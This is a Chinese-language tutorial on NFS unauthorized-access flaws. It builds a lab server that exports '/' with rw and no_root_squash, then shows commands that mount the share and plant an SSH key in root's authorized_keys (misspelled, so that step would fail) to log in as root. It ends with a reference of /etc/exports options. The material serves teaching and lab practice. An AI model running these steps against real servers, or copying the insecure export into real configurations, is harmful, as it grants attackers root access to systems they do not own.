未授权访问漏洞
NFS未授权访问漏洞
漏洞复现
# 安装nfs服务
yum install nfs-utils.x86_64 -y
# 启动服务
systemctl start rpcbind.service # 如果这个服务不启动,nfs服务会启动失败
systemctl start nfs-server.service
# 配置服务开机自启
systemctl enable rpcbind.service
systemctl enable nfs-server.service
# 关闭防火墙或设置防火墙允许nfs服务通过
firewall-cmd --permanent --add-service=nfs
firewall-cmd --permanent --add-service=rpc-bind
firewall-cmd --permanent --add-service=mountd
firewall-cmd --reload
# 配置nfs
echo '/ *(rw,sync,no_root_squash)' >> /etc/exports
# 启动共享
exportfs -r
# 查看共享
showmount -e
# 客户端挂载,挂载到本地的/tmp/test路径
mount -t nfs server_ip:/ /tmp/test
对NFS未授权访问漏洞进行利用
# 扫描服务器IP
rpcinfo -p server_ip
# 查看nfs挂载
showmount -e server_ip
# 配置ssh永久连接
mount -t nfs server_ip:/ /tmp/test
ssh-keygen
cat ~/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/autorized_keys
ssh root@server_ip
漏洞分析
/etc/exports文件格式
<输出目录> [客户端1 选项(访问权限,用户映射,其他)] [客户端2 选项(访问权限,用户映射,其他)]
输出目录
需要共享给客户端使用的目录。
客户端
网段或单个IP均可:10.10.10.0/24
选型
- 设置输出目录只读:ro
- 设置输出目录读写:rw
用户映射
- all_squash:将远程访问的所有普通用户及所属组都映射为匿名用户或用户组(nfsnobody);
- no_all_squash:与all_squash取反(默认设置);
- root_squash:将root用户及所属组都映射为匿名用户或用户组(默认设置);
- no_root_squash:与root_squash取反;
- anonuid=xxx:将远程访问的所有用户都映射为匿名用户,并指定该用户为本地用户(UID=xxx);
- anongid=xxx:将远程访问的所有用户组都映射为匿名用户组账户,并指定该匿名用户组账户为本地用户组账户(GID=xxx);
其它选项
- secure:限制客户端只能从小于1024的tcp/ip端口连接nfs服务器(默认设置);
- insecure:允许客户端从大于1024的tcp/ip端口连接服务器;
- sync:将数据同步写入内存缓冲区与磁盘中,效率低,但可以保证数据的一致性;
- async:将数据先保存在内存缓冲区中,必要时才写入磁盘;
- wdelay:检查是否有相关的写操作,如果有则将这些写操作一起执行,这样可以提高效率(默认设置);
- no_wdelay:若有写操作则立即执行,应与sync配合使用;
- subtree:若输出目录是一个子目录,则nfs服务器将检查其父目录的权限(默认设置);
- no_subtree:即使输出目录是一个子目录,nfs服务器也不检查其父目录的权限,这样可以提高效率;